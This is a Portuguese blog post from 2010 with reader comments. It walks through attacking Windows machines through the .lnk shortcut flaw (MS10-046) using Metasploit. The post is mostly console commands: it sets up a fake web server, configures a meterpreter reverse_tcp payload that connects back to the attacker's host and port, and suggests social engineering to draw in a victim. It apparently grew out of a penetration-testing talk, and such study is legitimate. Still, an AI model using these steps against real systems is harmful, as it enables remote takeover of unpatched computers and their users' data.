3 de dezembro de 2010

Atacando máquinas Windows (XP, Vista, 7, 2003, 2008) através de um webserver falso

Essa exploração baseia-se na falha existente no Windows, em todas as suas versões, no que diz respeito a manipulação de arquivos .lnk. Essa falha, assim como seu exploit tornaram-se públicos no final de na segunda quinzena de julho/2010.


O mais interessante, é que após tornar pública a falha, e consequentem ente o exploit, que surgiu um dia depois da divulgação da falha por parte da Microsoft, a correção da mesma só foi sair quase um mês depois, deixando milhões de máquinas vulneráveis a esse simples, mas devastador ataque.


Vamos lá...


# ./msfconsole


O primeiro comando seleciona o exploit que será usado:


> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader


Caso queiramos mais informações sobre o exploit e sua respectiva falha, podemos digitar o seguinte comando:


> info


Esse comando exibirá, além da informações sobre a falha, as opções que precisamos configurar para o correto funcionamento do exploit. As opções obrigatórias são: SRVHOST, SRVPORT


Vamos configurá-las:


> set SRVHOST 192.168.0.83


Esse último comando, permitirá configurarmos o IP no qual o servidor web falso será montado para que a vítima acesso-o. No comando abaixo, vamos configurar a porta na qual o servidor ficará escutando, à espera de uma conexão:


> set SRVPORT 80


Havendo configurado a parte básica do exploit, precisamos configurar o que ele fará após explorar a falha no navegador da vítima, isso é, o payload:


> set PAYLOAD windows/meterpreter/reverse_tcp

> set LHOST 192.168.0.83

> set LPORT 4444


Tudo configurado, funcionando bem, sem nenhum erro, simplesmente lançamos o exploit e aguardamos a vítima conectar em nosso servidor falso:


> exploit


Para conseguirmos que a vítima conecte, nada como um bom e velho ataque de engenharia social :-)


De forma mais ilustrativa, vocês podem assistir ao vídeo que gravei para minha apresentação da palestra sobre "Ferramentas Livres para Teste de Invasão", que ocorrei na 11ª edição do FISL, em julho/2010. O mais legal é que apresentei a falha no dia seguinte em que a mesma foi publicada, por isso verão que no vídeo o nome do exploit ainda não possui o nome final, que o que está no texto, por isso, sigam o que está no artigo:


3 comentários:

  1. Fala Luiz,

    Aqui é o Ronaldo do curso de forense da 4Linux.
    Muito bom o artigo e o blog, já virou fonte de consulta pra mim.

    Abraço!

    ResponderExcluir
  2. Oi Luiz,

    Meu nome é João Antonio, belo post.. quera saber se vc poderia ajudar.. tenho uma amiga fazendo mestrado de TI na Albania, e atese dela é baseada no eclipse, ela não esta conseguindo rodar o webgoat com o eclipse... simplismente não roda.. meu caro ela precisa de urgencia se não for muito abuso sera que pioderia ajudar... posso lhe passar o contato dela, ela usa o gmail pra comunicar... e aprendeu falar portugues sozinha... precisa muito de ajuda...
    te passo meu email aqui caso vc puder ajudar coloco vcs dois em contato!! abraços!
    joaoantoniosq@gmail.com

    moro no Rio tbm... abraços feliz natal e prospero ano novo!

    ResponderExcluir
  3. Muito bom esse post Luiz, você poderia criar uma area com as falhas mais recentes e como explorar tais falhas. João você já resolveu seu problema com o WebGoat?

    osvaldohp.blogspot.com

    ResponderExcluir